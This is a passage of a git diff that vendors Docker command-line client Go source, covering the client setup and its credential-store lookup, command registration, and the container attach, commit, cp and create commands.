+ "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +// Streams is an interface which exposes the standard input and output streams +type Streams interface { + In() *InStream + Out() *OutStream + Err() io.Writer +} + +// DockerCli represents the docker command line client. +// Instances of the client can be returned from NewDockerCli. +type DockerCli struct { + configFile *configfile.ConfigFile + in *InStream + out *OutStream + err io.Writer + keyFile string + client client.APIClient + hasExperimental bool + defaultVersion string +} + +// HasExperimental returns true if experimental features are accessible. +func (cli *DockerCli) HasExperimental() bool { + return cli.hasExperimental +} + +// DefaultVersion returns api.defaultVersion of DOCKER_API_VERSION if specified. 
+func (cli *DockerCli) DefaultVersion() string { + return cli.defaultVersion +} + +// Client returns the APIClient +func (cli *DockerCli) Client() client.APIClient { + return cli.client +} + +// Out returns the writer used for stdout +func (cli *DockerCli) Out() *OutStream { + return cli.out +} + +// Err returns the writer used for stderr +func (cli *DockerCli) Err() io.Writer { + return cli.err +} + +// In returns the reader used for stdin +func (cli *DockerCli) In() *InStream { + return cli.in +} + +// ShowHelp shows the command help. +func (cli *DockerCli) ShowHelp(cmd *cobra.Command, args []string) error { + cmd.SetOutput(cli.err) + cmd.HelpFunc()(cmd, args) + return nil +} + +// ConfigFile returns the ConfigFile +func (cli *DockerCli) ConfigFile() *configfile.ConfigFile { + return cli.configFile +} + +// GetAllCredentials returns all of the credentials stored in all of the +// configured credential stores. +func (cli *DockerCli) GetAllCredentials() (map[string]types.AuthConfig, error) { + auths := make(map[string]types.AuthConfig) + for registry := range cli.configFile.CredentialHelpers { + helper := cli.CredentialsStore(registry) + newAuths, err := helper.GetAll() + if err != nil { + return nil, err + } + addAll(auths, newAuths) + } + defaultStore := cli.CredentialsStore("") + newAuths, err := defaultStore.GetAll() + if err != nil { + return nil, err + } + addAll(auths, newAuths) + return auths, nil +} + +func addAll(to, from map[string]types.AuthConfig) { + for reg, ac := range from { + to[reg] = ac + } +} + +// CredentialsStore returns a new credentials store based +// on the settings provided in the configuration file. Empty string returns +// the default credential store. 
+func (cli *DockerCli) CredentialsStore(serverAddress string) credentials.Store { + if helper := getConfiguredCredentialStore(cli.configFile, serverAddress); helper != "" { + return credentials.NewNativeStore(cli.configFile, helper) + } + return credentials.NewFileStore(cli.configFile) +} + +// getConfiguredCredentialStore returns the credential helper configured for the +// given registry, the default credsStore, or the empty string if neither are +// configured. +func getConfiguredCredentialStore(c *configfile.ConfigFile, serverAddress string) string { + if c.CredentialHelpers != nil && serverAddress != "" { + if helper, exists := c.CredentialHelpers[serverAddress]; exists { + return helper + } + } + return c.CredentialsStore +} + +// Initialize the dockerCli runs initialization that must happen after command +// line flags are parsed. +func (cli *DockerCli) Initialize(opts *cliflags.ClientOptions) error { + cli.configFile = LoadDefaultConfigFile(cli.err) + + var err error + cli.client, err = NewAPIClientFromFlags(opts.Common, cli.configFile) + if err != nil { + return err + } + + cli.defaultVersion = cli.client.ClientVersion() + + if opts.Common.TrustKey == "" { + cli.keyFile = filepath.Join(cliconfig.ConfigDir(), cliflags.DefaultTrustKeyFile) + } else { + cli.keyFile = opts.Common.TrustKey + } + + if ping, err := cli.client.Ping(context.Background()); err == nil { + cli.hasExperimental = ping.Experimental + + // since the new header was added in 1.25, assume server is 1.24 if header is not present. + if ping.APIVersion == "" { + ping.APIVersion = "1.24" + } + + // if server version is lower than the current cli, downgrade + if versions.LessThan(ping.APIVersion, cli.client.ClientVersion()) { + cli.client.UpdateClientVersion(ping.APIVersion) + } + } + return nil +} + +// NewDockerCli returns a DockerCli instance with IO output and error streams set by in, out and err. 
+func NewDockerCli(in io.ReadCloser, out, err io.Writer) *DockerCli { + return &DockerCli{in: NewInStream(in), out: NewOutStream(out), err: err} +} + +// LoadDefaultConfigFile attempts to load the default config file and returns +// an initialized ConfigFile struct if none is found. +func LoadDefaultConfigFile(err io.Writer) *configfile.ConfigFile { + configFile, e := cliconfig.Load(cliconfig.ConfigDir()) + if e != nil { + fmt.Fprintf(err, "WARNING: Error loading config file:%v\n", e) + } + if !configFile.ContainsAuth() { + credentials.DetectDefaultStore(configFile) + } + return configFile +} + +// NewAPIClientFromFlags creates a new APIClient from command line flags +func NewAPIClientFromFlags(opts *cliflags.CommonOptions, configFile *configfile.ConfigFile) (client.APIClient, error) { + host, err := getServerHost(opts.Hosts, opts.TLSOptions) + if err != nil { + return &client.Client{}, err + } + + customHeaders := configFile.HTTPHeaders + if customHeaders == nil { + customHeaders = map[string]string{} + } + customHeaders["User-Agent"] = UserAgent() + + verStr := api.DefaultVersion + if tmpStr := os.Getenv("DOCKER_API_VERSION"); tmpStr != "" { + verStr = tmpStr + } + + httpClient, err := newHTTPClient(host, opts.TLSOptions) + if err != nil { + return &client.Client{}, err + } + + return client.NewClient(host, verStr, httpClient, customHeaders) +} + +func getServerHost(hosts []string, tlsOptions *tlsconfig.Options) (host string, err error) { + switch len(hosts) { + case 0: + host = os.Getenv("DOCKER_HOST") + case 1: + host = hosts[0] + default: + return "", errors.New("Please specify only one -H") + } + + host, err = dopts.ParseHost(tlsOptions != nil, host) + return +} + +func newHTTPClient(host string, tlsOptions *tlsconfig.Options) (*http.Client, error) { + if tlsOptions == nil { + // let the api client configure the default transport. 
+ return nil, nil + } + + config, err := tlsconfig.Client(*tlsOptions) + if err != nil { + return nil, err + } + tr := &http.Transport{ + TLSClientConfig: config, + } + proto, addr, _, err := client.ParseHost(host) + if err != nil { + return nil, err + } + + sockets.ConfigureTransport(tr, proto, addr) + + return &http.Client{ + Transport: tr, + }, nil +} + +// UserAgent returns the user agent string used for making API requests +func UserAgent() string { + return "Docker-Client/" + dockerversion.Version + " (" + runtime.GOOS + ")" +} diff --git a/vendor/github.com/docker/docker/cli/command/commands/commands.go b/vendor/github.com/docker/docker/cli/command/commands/commands.go new file mode 100644 index 0000000000..d64d5680cc --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/commands/commands.go @@ -0,0 +1,91 @@ +package commands + +import ( + "os" + + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/checkpoint" + "github.com/docker/docker/cli/command/container" + "github.com/docker/docker/cli/command/image" + "github.com/docker/docker/cli/command/network" + "github.com/docker/docker/cli/command/node" + "github.com/docker/docker/cli/command/plugin" + "github.com/docker/docker/cli/command/registry" + "github.com/docker/docker/cli/command/secret" + "github.com/docker/docker/cli/command/service" + "github.com/docker/docker/cli/command/stack" + "github.com/docker/docker/cli/command/swarm" + "github.com/docker/docker/cli/command/system" + "github.com/docker/docker/cli/command/volume" + "github.com/spf13/cobra" +) + +// AddCommands adds all the commands from cli/command to the root command +func AddCommands(cmd *cobra.Command, dockerCli *command.DockerCli) { + cmd.AddCommand( + node.NewNodeCommand(dockerCli), + service.NewServiceCommand(dockerCli), + swarm.NewSwarmCommand(dockerCli), + secret.NewSecretCommand(dockerCli), + container.NewContainerCommand(dockerCli), + image.NewImageCommand(dockerCli), + 
system.NewSystemCommand(dockerCli), + container.NewRunCommand(dockerCli), + image.NewBuildCommand(dockerCli), + network.NewNetworkCommand(dockerCli), + hide(system.NewEventsCommand(dockerCli)), + registry.NewLoginCommand(dockerCli), + registry.NewLogoutCommand(dockerCli), + registry.NewSearchCommand(dockerCli), + system.NewVersionCommand(dockerCli), + volume.NewVolumeCommand(dockerCli), + hide(system.NewInfoCommand(dockerCli)), + hide(container.NewAttachCommand(dockerCli)), + hide(container.NewCommitCommand(dockerCli)), + hide(container.NewCopyCommand(dockerCli)), + hide(container.NewCreateCommand(dockerCli)), + hide(container.NewDiffCommand(dockerCli)), + hide(container.NewExecCommand(dockerCli)), + hide(container.NewExportCommand(dockerCli)), + hide(container.NewKillCommand(dockerCli)), + hide(container.NewLogsCommand(dockerCli)), + hide(container.NewPauseCommand(dockerCli)), + hide(container.NewPortCommand(dockerCli)), + hide(container.NewPsCommand(dockerCli)), + hide(container.NewRenameCommand(dockerCli)), + hide(container.NewRestartCommand(dockerCli)), + hide(container.NewRmCommand(dockerCli)), + hide(container.NewStartCommand(dockerCli)), + hide(container.NewStatsCommand(dockerCli)), + hide(container.NewStopCommand(dockerCli)), + hide(container.NewTopCommand(dockerCli)), + hide(container.NewUnpauseCommand(dockerCli)), + hide(container.NewUpdateCommand(dockerCli)), + hide(container.NewWaitCommand(dockerCli)), + hide(image.NewHistoryCommand(dockerCli)), + hide(image.NewImagesCommand(dockerCli)), + hide(image.NewImportCommand(dockerCli)), + hide(image.NewLoadCommand(dockerCli)), + hide(image.NewPullCommand(dockerCli)), + hide(image.NewPushCommand(dockerCli)), + hide(image.NewRemoveCommand(dockerCli)), + hide(image.NewSaveCommand(dockerCli)), + hide(image.NewTagCommand(dockerCli)), + hide(system.NewInspectCommand(dockerCli)), + stack.NewStackCommand(dockerCli), + stack.NewTopLevelDeployCommand(dockerCli), + checkpoint.NewCheckpointCommand(dockerCli), + 
plugin.NewPluginCommand(dockerCli), + ) + +} + +func hide(cmd *cobra.Command) *cobra.Command { + if os.Getenv("DOCKER_HIDE_LEGACY_COMMANDS") == "" { + return cmd + } + cmdCopy := *cmd + cmdCopy.Hidden = true + cmdCopy.Aliases = []string{} + return &cmdCopy +} diff --git a/vendor/github.com/docker/docker/cli/command/container/attach.go b/vendor/github.com/docker/docker/cli/command/container/attach.go new file mode 100644 index 0000000000..31bb109344 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/attach.go @@ -0,0 +1,130 @@ +package container + +import ( + "fmt" + "io" + "net/http/httputil" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/signal" + "github.com/spf13/cobra" +) + +type attachOptions struct { + noStdin bool + proxy bool + detachKeys string + + container string +} + +// NewAttachCommand creates a new cobra.Command for `docker attach` +func NewAttachCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts attachOptions + + cmd := &cobra.Command{ + Use: "attach [OPTIONS] CONTAINER", + Short: "Attach to a running container", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + return runAttach(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVar(&opts.noStdin, "no-stdin", false, "Do not attach STDIN") + flags.BoolVar(&opts.proxy, "sig-proxy", true, "Proxy all received signals to the process") + flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container") + return cmd +} + +func runAttach(dockerCli *command.DockerCli, opts *attachOptions) error { + ctx := context.Background() + client := dockerCli.Client() + + c, err := client.ContainerInspect(ctx, opts.container) + if err != nil { + return err + } + + if !c.State.Running { + return fmt.Errorf("You 
cannot attach to a stopped container, start it first") + } + + if c.State.Paused { + return fmt.Errorf("You cannot attach to a paused container, unpause it first") + } + + if err := dockerCli.In().CheckTty(!opts.noStdin, c.Config.Tty); err != nil { + return err + } + + if opts.detachKeys != "" { + dockerCli.ConfigFile().DetachKeys = opts.detachKeys + } + + options := types.ContainerAttachOptions{ + Stream: true, + Stdin: !opts.noStdin && c.Config.OpenStdin, + Stdout: true, + Stderr: true, + DetachKeys: dockerCli.ConfigFile().DetachKeys, + } + + var in io.ReadCloser + if options.Stdin { + in = dockerCli.In() + } + + if opts.proxy && !c.Config.Tty { + sigc := ForwardAllSignals(ctx, dockerCli, opts.container) + defer signal.StopCatch(sigc) + } + + resp, errAttach := client.ContainerAttach(ctx, opts.container, options) + if errAttach != nil && errAttach != httputil.ErrPersistEOF { + // ContainerAttach returns an ErrPersistEOF (connection closed) + // means server met an error and put it in Hijacked connection + // keep the error and read detailed error message from hijacked connection later + return errAttach + } + defer resp.Close() + + if c.Config.Tty && dockerCli.Out().IsTerminal() { + height, width := dockerCli.Out().GetTtySize() + // To handle the case where a user repeatedly attaches/detaches without resizing their + // terminal, the only way to get the shell prompt to display for attaches 2+ is to artificially + // resize it, then go back to normal. Without this, every attach after the first will + // require the user to manually resize or hit enter. + resizeTtyTo(ctx, client, opts.container, height+1, width+1, false) + + // After the above resizing occurs, the call to MonitorTtySize below will handle resetting back + // to the actual size. 
+ if err := MonitorTtySize(ctx, dockerCli, opts.container, false); err != nil { + logrus.Debugf("Error monitoring TTY size: %s", err) + } + } + if err := holdHijackedConnection(ctx, dockerCli, c.Config.Tty, in, dockerCli.Out(), dockerCli.Err(), resp); err != nil { + return err + } + + if errAttach != nil { + return errAttach + } + + _, status, err := getExitCode(ctx, dockerCli, opts.container) + if err != nil { + return err + } + if status != 0 { + return cli.StatusError{StatusCode: status} + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/cmd.go b/vendor/github.com/docker/docker/cli/command/container/cmd.go new file mode 100644 index 0000000000..3e9b4880ac --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/cmd.go @@ -0,0 +1,46 @@ +package container + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewContainerCommand returns a cobra command for `container` subcommands +func NewContainerCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "container", + Short: "Manage containers", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + NewAttachCommand(dockerCli), + NewCommitCommand(dockerCli), + NewCopyCommand(dockerCli), + NewCreateCommand(dockerCli), + NewDiffCommand(dockerCli), + NewExecCommand(dockerCli), + NewExportCommand(dockerCli), + NewKillCommand(dockerCli), + NewLogsCommand(dockerCli), + NewPauseCommand(dockerCli), + NewPortCommand(dockerCli), + NewRenameCommand(dockerCli), + NewRestartCommand(dockerCli), + NewRmCommand(dockerCli), + NewRunCommand(dockerCli), + NewStartCommand(dockerCli), + NewStatsCommand(dockerCli), + NewStopCommand(dockerCli), + NewTopCommand(dockerCli), + NewUnpauseCommand(dockerCli), + NewUpdateCommand(dockerCli), + NewWaitCommand(dockerCli), + newListCommand(dockerCli), + newInspectCommand(dockerCli), + NewPruneCommand(dockerCli), + ) + return cmd 
+} diff --git a/vendor/github.com/docker/docker/cli/command/container/commit.go b/vendor/github.com/docker/docker/cli/command/container/commit.go new file mode 100644 index 0000000000..cf8d0102a6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/commit.go @@ -0,0 +1,76 @@ +package container + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + dockeropts "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +type commitOptions struct { + container string + reference string + + pause bool + comment string + author string + changes dockeropts.ListOpts +} + +// NewCommitCommand creates a new cobra.Command for `docker commit` +func NewCommitCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts commitOptions + + cmd := &cobra.Command{ + Use: "commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]]", + Short: "Create a new image from a container's changes", + Args: cli.RequiresRangeArgs(1, 2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + if len(args) > 1 { + opts.reference = args[1] + } + return runCommit(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.SetInterspersed(false) + + flags.BoolVarP(&opts.pause, "pause", "p", true, "Pause container during commit") + flags.StringVarP(&opts.comment, "message", "m", "", "Commit message") + flags.StringVarP(&opts.author, "author", "a", "", "Author (e.g., \"John Hannibal Smith \")") + + opts.changes = dockeropts.NewListOpts(nil) + flags.VarP(&opts.changes, "change", "c", "Apply Dockerfile instruction to the created image") + + return cmd +} + +func runCommit(dockerCli *command.DockerCli, opts *commitOptions) error { + ctx := context.Background() + + name := opts.container + reference := opts.reference + + options := types.ContainerCommitOptions{ + Reference: reference, + Comment: opts.comment, + Author: opts.author, + Changes: 
opts.changes.GetAll(), + Pause: opts.pause, + } + + response, err := dockerCli.Client().ContainerCommit(ctx, name, options) + if err != nil { + return err + } + + fmt.Fprintln(dockerCli.Out(), response.ID) + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/cp.go b/vendor/github.com/docker/docker/cli/command/container/cp.go new file mode 100644 index 0000000000..17ab2accf9 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/cp.go @@ -0,0 +1,303 @@ +package container + +import ( + "fmt" + "io" + "os" + "path/filepath" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/system" + "github.com/spf13/cobra" +) + +type copyOptions struct { + source string + destination string + followLink bool +} + +type copyDirection int + +const ( + fromContainer copyDirection = (1 << iota) + toContainer + acrossContainers = fromContainer | toContainer +) + +type cpConfig struct { + followLink bool +} + +// NewCopyCommand creates a new `docker cp` command +func NewCopyCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts copyOptions + + cmd := &cobra.Command{ + Use: `cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|- + docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH`, + Short: "Copy files/folders between a container and the local filesystem", + Long: strings.Join([]string{ + "Copy files/folders between a container and the local filesystem\n", + "\nUse '-' as the source to read a tar archive from stdin\n", + "and extract it to a directory destination in a container.\n", + "Use '-' as the destination to stream a tar archive of a\n", + "container source to stdout.", + }, ""), + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + if args[0] == "" { + return fmt.Errorf("source can not be empty") + } + if args[1] == "" { + 
return fmt.Errorf("destination can not be empty") + } + opts.source = args[0] + opts.destination = args[1] + return runCopy(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.followLink, "follow-link", "L", false, "Always follow symbol link in SRC_PATH") + + return cmd +} + +func runCopy(dockerCli *command.DockerCli, opts copyOptions) error { + srcContainer, srcPath := splitCpArg(opts.source) + dstContainer, dstPath := splitCpArg(opts.destination) + + var direction copyDirection + if srcContainer != "" { + direction |= fromContainer + } + if dstContainer != "" { + direction |= toContainer + } + + cpParam := &cpConfig{ + followLink: opts.followLink, + } + + ctx := context.Background() + + switch direction { + case fromContainer: + return copyFromContainer(ctx, dockerCli, srcContainer, srcPath, dstPath, cpParam) + case toContainer: + return copyToContainer(ctx, dockerCli, srcPath, dstContainer, dstPath, cpParam) + case acrossContainers: + // Copying between containers isn't supported. + return fmt.Errorf("copying between containers is not supported") + default: + // User didn't specify any container. + return fmt.Errorf("must specify at least one container source") + } +} + +func statContainerPath(ctx context.Context, dockerCli *command.DockerCli, containerName, path string) (types.ContainerPathStat, error) { + return dockerCli.Client().ContainerStatPath(ctx, containerName, path) +} + +func resolveLocalPath(localPath string) (absPath string, err error) { + if absPath, err = filepath.Abs(localPath); err != nil { + return + } + + return archive.PreserveTrailingDotOrSeparator(absPath, localPath), nil +} + +func copyFromContainer(ctx context.Context, dockerCli *command.DockerCli, srcContainer, srcPath, dstPath string, cpParam *cpConfig) (err error) { + if dstPath != "-" { + // Get an absolute destination path. 
+ dstPath, err = resolveLocalPath(dstPath) + if err != nil { + return err + } + } + + // if client requests to follow symbol link, then must decide target file to be copied + var rebaseName string + if cpParam.followLink { + srcStat, err := statContainerPath(ctx, dockerCli, srcContainer, srcPath) + + // If the destination is a symbolic link, we should follow it. + if err == nil && srcStat.Mode&os.ModeSymlink != 0 { + linkTarget := srcStat.LinkTarget + if !system.IsAbs(linkTarget) { + // Join with the parent directory. + srcParent, _ := archive.SplitPathDirEntry(srcPath) + linkTarget = filepath.Join(srcParent, linkTarget) + } + + linkTarget, rebaseName = archive.GetRebaseName(srcPath, linkTarget) + srcPath = linkTarget + } + + } + + content, stat, err := dockerCli.Client().CopyFromContainer(ctx, srcContainer, srcPath) + if err != nil { + return err + } + defer content.Close() + + if dstPath == "-" { + // Send the response to STDOUT. + _, err = io.Copy(os.Stdout, content) + + return err + } + + // Prepare source copy info. + srcInfo := archive.CopyInfo{ + Path: srcPath, + Exists: true, + IsDir: stat.Mode.IsDir(), + RebaseName: rebaseName, + } + + preArchive := content + if len(srcInfo.RebaseName) != 0 { + _, srcBase := archive.SplitPathDirEntry(srcInfo.Path) + preArchive = archive.RebaseArchiveEntries(content, srcBase, srcInfo.RebaseName) + } + // See comments in the implementation of `archive.CopyTo` for exactly what + // goes into deciding how and whether the source archive needs to be + // altered for the correct copy behavior. + return archive.CopyTo(preArchive, srcInfo, dstPath) +} + +func copyToContainer(ctx context.Context, dockerCli *command.DockerCli, srcPath, dstContainer, dstPath string, cpParam *cpConfig) (err error) { + if srcPath != "-" { + // Get an absolute source path. 
+ srcPath, err = resolveLocalPath(srcPath) + if err != nil { + return err + } + } + + // In order to get the copy behavior right, we need to know information + // about both the source and destination. The API is a simple tar + // archive/extract API but we can use the stat info header about the + // destination to be more informed about exactly what the destination is. + + // Prepare destination copy info by stat-ing the container path. + dstInfo := archive.CopyInfo{Path: dstPath} + dstStat, err := statContainerPath(ctx, dockerCli, dstContainer, dstPath) + + // If the destination is a symbolic link, we should evaluate it. + if err == nil && dstStat.Mode&os.ModeSymlink != 0 { + linkTarget := dstStat.LinkTarget + if !system.IsAbs(linkTarget) { + // Join with the parent directory. + dstParent, _ := archive.SplitPathDirEntry(dstPath) + linkTarget = filepath.Join(dstParent, linkTarget) + } + + dstInfo.Path = linkTarget + dstStat, err = statContainerPath(ctx, dockerCli, dstContainer, linkTarget) + } + + // Ignore any error and assume that the parent directory of the destination + // path exists, in which case the copy may still succeed. If there is any + // type of conflict (e.g., non-directory overwriting an existing directory + // or vice versa) the extraction will fail. If the destination simply did + // not exist, but the parent directory does, the extraction will still + // succeed. + if err == nil { + dstInfo.Exists, dstInfo.IsDir = true, dstStat.Mode.IsDir() + } + + var ( + content io.Reader + resolvedDstPath string + ) + + if srcPath == "-" { + // Use STDIN. + content = os.Stdin + resolvedDstPath = dstInfo.Path + if !dstInfo.IsDir { + return fmt.Errorf("destination %q must be a directory", fmt.Sprintf("%s:%s", dstContainer, dstPath)) + } + } else { + // Prepare source copy info. 
+ srcInfo, err := archive.CopyInfoSourcePath(srcPath, cpParam.followLink) + if err != nil { + return err + } + + srcArchive, err := archive.TarResource(srcInfo) + if err != nil { + return err + } + defer srcArchive.Close() + + // With the stat info about the local source as well as the + // destination, we have enough information to know whether we need to + // alter the archive that we upload so that when the server extracts + // it to the specified directory in the container we get the desired + // copy behavior. + + // See comments in the implementation of `archive.PrepareArchiveCopy` + // for exactly what goes into deciding how and whether the source + // archive needs to be altered for the correct copy behavior when it is + // extracted. This function also infers from the source and destination + // info which directory to extract to, which may be the parent of the + // destination that the user specified. + dstDir, preparedArchive, err := archive.PrepareArchiveCopy(srcArchive, srcInfo, dstInfo) + if err != nil { + return err + } + defer preparedArchive.Close() + + resolvedDstPath = dstDir + content = preparedArchive + } + + options := types.CopyToContainerOptions{ + AllowOverwriteDirWithFile: false, + } + + return dockerCli.Client().CopyToContainer(ctx, dstContainer, resolvedDstPath, content, options) +} + +// We use `:` as a delimiter between CONTAINER and PATH, but `:` could also be +// in a valid LOCALPATH, like `file:name.txt`. We can resolve this ambiguity by +// requiring a LOCALPATH with a `:` to be made explicit with a relative or +// absolute path: +// `/path/to/file:name.txt` or `./file:name.txt` +// +// This is apparently how `scp` handles this as well: +// http://www.cyberciti.biz/faq/rsync-scp-file-name-with-colon-punctuation-in-it/ +// +// We can't simply check for a filepath separator because container names may +// have a separator, e.g., "host0/cname1" if container is in a Docker cluster, +// so we have to check for a `/` or `.` prefix. 
Also, in the case of a Windows +// client, a `:` could be part of an absolute Windows path, in which case it +// is immediately proceeded by a backslash. +func splitCpArg(arg string) (container, path string) { + if system.IsAbs(arg) { + // Explicit local absolute path, e.g., `C:\foo` or `/foo`. + return "", arg + } + + parts := strings.SplitN(arg, ":", 2) + + if len(parts) == 1 || strings.HasPrefix(parts[0], ".") { + // Either there's no `:` in the arg + // OR it's an explicit local relative path like `./file:name.txt`. + return "", arg + } + + return parts[0], parts[1] +} diff --git a/vendor/github.com/docker/docker/cli/command/container/create.go b/vendor/github.com/docker/docker/cli/command/container/create.go new file mode 100644 index 0000000000..d5e63bd9ef --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/create.go @@ -0,0 +1,218 @@ +package container + +import ( + "fmt" + "io" + "os" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/image" + "github.com/docker/docker/pkg/jsonmessage" + // FIXME migrate to docker/distribution/reference + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + apiclient "github.com/docker/docker/client" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +type createOptions struct { + name string +} + +// NewCreateCommand creates a new cobra.Command for `docker create` +func NewCreateCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts createOptions + var copts *runconfigopts.ContainerOptions + + cmd := &cobra.Command{ + Use: "create [OPTIONS] IMAGE [COMMAND] [ARG...]", + Short: "Create a new container", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd 
*cobra.Command, args []string) error { + copts.Image = args[0] + if len(args) > 1 { + copts.Args = args[1:] + } + return runCreate(dockerCli, cmd.Flags(), &opts, copts) + }, + } + + flags := cmd.Flags() + flags.SetInterspersed(false) + + flags.StringVar(&opts.name, "name", "", "Assign a name to the container") + + // Add an explicit help that doesn't have a `-h` to prevent the conflict + // with hostname + flags.Bool("help", false, "Print usage") + + command.AddTrustedFlags(flags, true) + copts = runconfigopts.AddFlags(flags) + return cmd +} + +func runCreate(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts *createOptions, copts *runconfigopts.ContainerOptions) error { + config, hostConfig, networkingConfig, err := runconfigopts.Parse(flags, copts) + if err != nil { + reportError(dockerCli.Err(), "create", err.Error(), true) + return cli.StatusError{StatusCode: 125} + } + response, err := createContainer(context.Background(), dockerCli, config, hostConfig, networkingConfig, hostConfig.ContainerIDFile, opts.name) + if err != nil { + return err + } + fmt.Fprintf(dockerCli.Out(), "%s\n", response.ID) + return nil +} + +func pullImage(ctx context.Context, dockerCli *command.DockerCli, image string, out io.Writer) error { + ref, err := reference.ParseNamed(image) + if err != nil { + return err + } + + // Resolve the Repository name from fqn to RepositoryInfo + repoInfo, err := registry.ParseRepositoryInfo(ref) + if err != nil { + return err + } + + authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) + encodedAuth, err := command.EncodeAuthToBase64(authConfig) + if err != nil { + return err + } + + options := types.ImageCreateOptions{ + RegistryAuth: encodedAuth, + } + + responseBody, err := dockerCli.Client().ImageCreate(ctx, image, options) + if err != nil { + return err + } + defer responseBody.Close() + + return jsonmessage.DisplayJSONMessagesStream( + responseBody, + out, + dockerCli.Out().FD(), + dockerCli.Out().IsTerminal(), + nil) +} + 
+type cidFile struct { + path string + file *os.File + written bool +} + +func (cid *cidFile) Close() error { + cid.file.Close() + + if !cid.written { + if err := os.Remove(cid.path); err != nil { + return fmt.Errorf("failed to remove the CID file '%s': %s \n", cid.path, err) + } + } + + return nil +} + +func (cid *cidFile) Write(id string) error { + if _, err := cid.file.Write([]byte(id)); err != nil { + return fmt.Errorf("Failed to write the container ID to the file: %s", err) + } + cid.written = true + return nil +} + +func newCIDFile(path string) (*cidFile, error) { + if _, err := os.Stat(path); err == nil { + return nil, fmt.Errorf("Container ID file found, make sure the other container isn't running or delete %s", path) + } + + f, err := os.Create(path) + if err != nil { + return nil, fmt.Errorf("Failed to create the container ID file: %s", err) + } + + return &cidFile{path: path, file: f}, nil +} + +func createContainer(ctx context.Context, dockerCli *command.DockerCli, config *container.Config, hostConfig *container.HostConfig, networkingConfig *networktypes.NetworkingConfig, cidfile, name string) (*container.ContainerCreateCreatedBody, error) { + stderr := dockerCli.Err() + + var containerIDFile *cidFile + if cidfile != "" { + var err error + if containerIDFile, err = newCIDFile(cidfile); err != nil { + return nil, err + } + defer containerIDFile.Close() + } + + var trustedRef reference.Canonical + _, ref, err := reference.ParseIDOrReference(config.Image) + if err != nil { + return nil, err + } + if ref != nil { + ref = reference.WithDefaultTag(ref) + + if ref, ok := ref.(reference.NamedTagged); ok && command.IsTrusted() { + var err error + trustedRef, err = image.TrustedReference(ctx, dockerCli, ref, nil) + if err != nil { + return nil, err + } + config.Image = trustedRef.String() + } + } + + //create the container + response, err := dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, name) + + //if image not found try to pull it 
+ if err != nil { + if apiclient.IsErrImageNotFound(err) && ref != nil { + fmt.Fprintf(stderr, "Unable to find image '%s' locally\n", ref.String()) + + // we don't want to write to stdout anything apart from container.ID + if err = pullImage(ctx, dockerCli, config.Image, stderr); err != nil { + return nil, err + } + if ref, ok := ref.(reference.NamedTagged); ok && trustedRef != nil { + if err := image.TagTrusted(ctx, dockerCli, trustedRef, ref); err != nil { + return nil, err + } + } + // Retry + var retryErr error + response, retryErr = dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, name) + if retryErr != nil { + return nil, retryErr + } + } else { + return nil, err + } + } + + for _, warning := range response.Warnings { + fmt.Fprintf(stderr, "WARNING: %s\n", warning) + } + if containerIDFile != nil { + if err = containerIDFile.Write(response.ID); err != nil { + return nil, err + } + } + return &response, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/diff.go b/vendor/github.com/docker/docker/cli/command/container/diff.go new file mode 100644 index 0000000000..12d6591014 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/diff.go @@ -0,0 +1,58 @@ +package container + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + 